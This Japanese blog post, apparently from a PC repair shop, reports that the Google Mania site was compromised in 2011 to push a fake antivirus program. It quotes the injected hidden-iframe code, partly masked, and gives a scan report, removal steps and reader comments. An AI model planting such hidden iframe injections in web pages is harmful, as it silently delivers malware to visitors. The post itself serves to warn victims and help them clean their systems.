事の始まりはgoogleさんで調べ物をしてたどり着いたGoogle Maniaというサイト。
このサイトではgoogleの各種サービスについて詳しい解説などがされていて、この関係としては結構人気があると思われます。
検索でも最上位に表示されるような状況なので知っている方も多いかもしれません。
改竄されてしまったサイト(Google Mania)
ところがこのサイト長らくメンテナンス等されておらず放置状態となっています。
サイト自体も古いバージョンのCMSが利用されており既知の重大な脆弱性を持っているのですがメンテナンスされていない事もあって、悪意のある第3者によってサイトの改ざんが行われてしまっています。(ざっと確認しましたが全ページ改ざんされているようです)
6月頃に一度改ざんされて攻撃サイトと化してしまっていたようです(ソース)が、改ざんで埋め込まれたサイトが停止された事でいったんは落ち着いたようです。
(サイトメンテナンスによって改ざんされたわけではないようで、脆弱性はそのまま?)
今回2011年8月22日(今日)にアクセスしたわけですが、新しく改ざんされたかもしくは停止されたサイトが復帰したかの理由によりまたしても攻撃サイトと化しています。
しかも現時点(8月22日 17:00)でほとんどのセキュリティーソフトが検知できない新種の偽セキュリティソフトが勝手にPCにインストールされ実行されてしまうという状況なのです。
(改ざんされたサイト)
Google Mania(google-mania.net)
(不正コード)
<div style=”position: absolute; left: -1999px; top: -2999px;”><iframe src=”*ttp://kliemwrznr.co.**/i.php?go=1″ width=”3″ height=”3″></iframe></div>
(ウィルス検査結果)
======================================= VirSCAN.org Scanned Report : Scanned time : 2011/08/22 17:14:43 (JST) Scanner results: 5% のアンチウイルスが(2/37) マルウェアと判定しました File Name : 0.2367670180808894.exe File Size : 936448 byte File Type : PE32 executable for MS Windows (GUI) Intel 80386 32-bit MD5 : 22f95e63e1e109d894149c6b9949d59f SHA1 : 5e1c325627988ebe86ea3dae280764334442104b Online report : http://r.virscan.org/173025f2d056d40ef7d8ff2442d76494 Scanner Engine Ver Sig Ver Scan result a-squared 5.1.0.3 20110822060411 - AhnLab V3 2011.08.22.02 2011.08.22 - AntiVir 8.2.6.32 7.11.13.155 - Antiy 2.0.18 20110804.11725727 - Arcavir 2011 201107140423 - Authentium 5.1.1 201108211932 - AVAST! 4.7.4 110821-1 Win32:FakeAlert-AZL [Trj] AVG 8.5.850 271.1.1/3849 - BitDefender 7.90123.8954708 7.38720 - ClamAV 0.97.1 13462 - Comodo 5.1 9829 - CP Secure 1.3.0.5 2011.08.19 - Dr.Web 5.0.2.3300 2011.08.22 - F-Prot 4.6.2.117 20110822 - F-Secure 7.02.73807 2011.08.22.01 - Fortinet 4.2.257 13.567 - GData 22.1742 20110822 - ViRobot 20110820 2011.08.20 - Ikarus T3.1.32.20.0 2011.08.22.79150 - JiangMin 13.0.900 2011.08.21 - Kaspersky 5.5.10 2011.08.22 - KingSoft 2009.2.5.15 2011.8.22.14 - McAfee 5400.1158 6445 - Microsoft 1.7604 2011.08.22 - NOD32 3.0.21 6398 - Norman 6.07.10 6.07.00 - Panda 9.05.01 2011.08.21 - Trend Micro 9.200-1012 8.360.11 - Quick Heal 11.00 2011.08.20 - Rising 20.0 23.71.03.03 - Sophos 3.22.0 4.68 Mal/FakeAV-LX Sunbelt 3.9.2497.2 10238 - Symantec 1.3.0.24 20110821.003 - nProtect 20110821.01 12475755 - The Hacker 6.7.0.1 v00282 - VBA32 3.12.16.4 20110821.1017 - VirusBuster 5.3.0.4 14.0.179.0/5952350 - =======================================
検出できたものは「Win32:FakeAlert-AZL [Trj]」、「Mal/FakeAV-LX」として発見していますね。
偽セキュリティソフト(Security Protection)ですので自分を棚に上げて存在しないウィルスを大量に発見したかのように振る舞い
駆除するためにお金を払え(ソフトを購入しろ)という動作を行います。
攻撃手法の詳細は分かりませんが危険な状態ですね。
偽セキュリティソフト(Security Protection)
一度感染すると自分以外の常駐プログラムをどんどん強制終了させ、本物のセキュリティソフトも停止させられます。
また、偽セキュリティソフトを終了させようとタスクマネージャー等を立ち上げても強制終了させられてしまいます。
ということで一度動作し出すとシャットダウンするしかなくなります。
(偽セキュリティソフトが動いていますが意味がないですし、他の不正プログラムをネットから引っ張ってくる可能性もあります)
駆除は以下の方法で可能です。(幸い今回のケースは簡単でした)
- 感染を確認したら即時ネットワーク接続を切断しパソコンをシャットダウンします。
有線接続の場合はケーブルを抜き、無線接続の場合は電波をOFFにするかアクセスポイントの接続を切断します。 - 再度電源を入れます。画面に何か表示されたらしばらくF8キーをトントン押し続けて下さい。
詳細オプションの選択メニュー(またはWindows拡張オプションメニュー)が表示されます。 - 「セーフモード」を選択してWindowsを起動します。
- 偽セキュリティソフトの起動を停止
スタート→すべてのプログラム→スタートアップ→に「Security Protection」という項目があるので
マウスカーソルがこの上において 右クリック→削除 - デスクトップのショートカットなどを削除
デスクトップ上に「Security Protection」というショートカットがあるので削除。
また、でたらめなファイル名アイコンがある場合はこれも削除(これが偽セキュリティソフトのインストーラーです)。
偽セキュリティソフトのアイコン
- 偽セキュリティソフト本体を削除
WindowsVista、7の場合
C:\Users\(ログイン名)\AppData\Roaming\defender.exeWindowsXP,2000の場合
C:\Documents and Settings\All Users\Application Data\defender.exeが偽セキュリティソフト本体なのでこれを削除
-
元の状態に戻す
パソコンを再起動します。
起動が終わったらネット接続を元に戻します(線を繋ぎ直す、または無線を再接続)。
以上です。
対象の箇所にファイルがない場合はファイル名でパソコン内を検索等してみて下さい。
(数日経てばほとんどのセキュリティソフトで対応できると思いますが。。。)
サイト管理者は自分のサイトに責任を持って管理していただきたいものですね。
昔のようにいわゆる危ないサイトにいかなければウィルスに感染しないという時代はとっくに終わっています。今回のようにウィルス対策ソフトのワクチンが間に合わない場合もありますが、それでも最低限の防御をしてより安全にインターネット等を楽しんでいただければと思います。
自信がない&原因が違うなどの場合は是非弊社にお預けください!
他社には断られたような事案も大歓迎。お困りのことがあったら、お気軽にご連絡ください。お見積もりは無料です。
Tel:0268-75-8270
または
「お問い合わせ」
よりご連絡ください。
お世話になります。本日まさにこのウイルスにやられました。上記サイトにアクセスしてすぐに勝手にスキャンをするソフトが立ち上がりました。あわててソフトを終了させたりし、ネットを閉じました。しかし他のスキャンソフトも動かず、スキャンを確認して駆除を使用とするとお金を払うサイトに誘導されました(その際はネットをつなげました)。
セーフモードでは他のスキャンソフトが立ち上がったのでいろいろやっているとき、他の同僚がこのサイトを教えてくれました。おかげで助かりました。
ちなみに自分のPC内での増殖や、復活などはないでしょうか?
また相手のサイトに接続してしまいましたが、新たに進入される可能性はありますか?
恐縮ですがお教え頂ければ幸いです。
こちらのPCのスペックです。
ウインドウズビスタ sp2
富士通ビブロMGY
IE8
グーグルカレンダーの同期について調べているうちに上記「google mania]に行きました
[roguekiller.exe]を使用して以下のログを確認し、2つのファイルを削除しました。
(そちらでは[defender.exeのみのようなのですが、[RDrvMon.exe]というファイルも検知されたため削除しました(別の話かもしれません)。
大変助かりました。ありがとうございました。
take
お役に立つ事ができて幸いです。
また、コメントいただきありがとうございます。
先ほど再確認を行いましたところ弊社が先日確認していた攻撃サイトアドレスが別のものに変わっている事が確認できました。(もうやられ放題という感じですね)
従いまして弊社のこの記事の内容では既に(1日経過していませんが…)異なる点が発生している可能性があります。
弊社で確認できたものはその後復活も増殖もありませんが、このような状態なので確実に大丈夫という事は言えない状況です。
現在でもまだ半数以上の大手ウィルススキャンソフトが対応できていない状況のようですので対策のとりようがないといった感もあります。
念のためにJAVA、AdobeのPDF関連ソフト、IEは最新状態である事を今一度ご確認いただいた上で様子を見ていただければと思います。
弊社でも新しい動き等が確認できましたら随時ご報告させていただこうと思っております。
追加自己レスです。
[RDrvMon.exe]は関係ありませんでした。
take
追加の情報ありがとうございます。
こうやってリアルタイムに必要な情報が追加・見られる事がインターネットの強みですね。
同じ被害に遭われた方の正しい道しるべとなれるようサイトを充実できればと思います。
また何かありましたら是非お声を届けていただければ幸いです。
記事投稿から2週間ほどが経過しましたが、相変わらず何の対策もとられていないようです。
こちらでできることをしてみましたがどうにもなっていません。
管理人への連絡(メール):音沙汰なし
ホスティング業者:「契約者の責任」として「何もしない」との回答
サイト管理者は他の運営サイトも運営を放棄しているような状態なのでもしかすると病気などで管理ができないのかもしれませんが、それでも現状は問題です。
ホスティング業者もサイトが改ざんされ第三者に悪影響を長期間与えているのにもかかわらず何もしないというのは対応として絶対に間違っていると思います。
(大抵、他社さんではなんらかの対応をしてもらえます。)
1日に何度も改ざんにあっているこのような状態のサイトには絶対に訪れるべきではありません。
みなさんお気をつけください。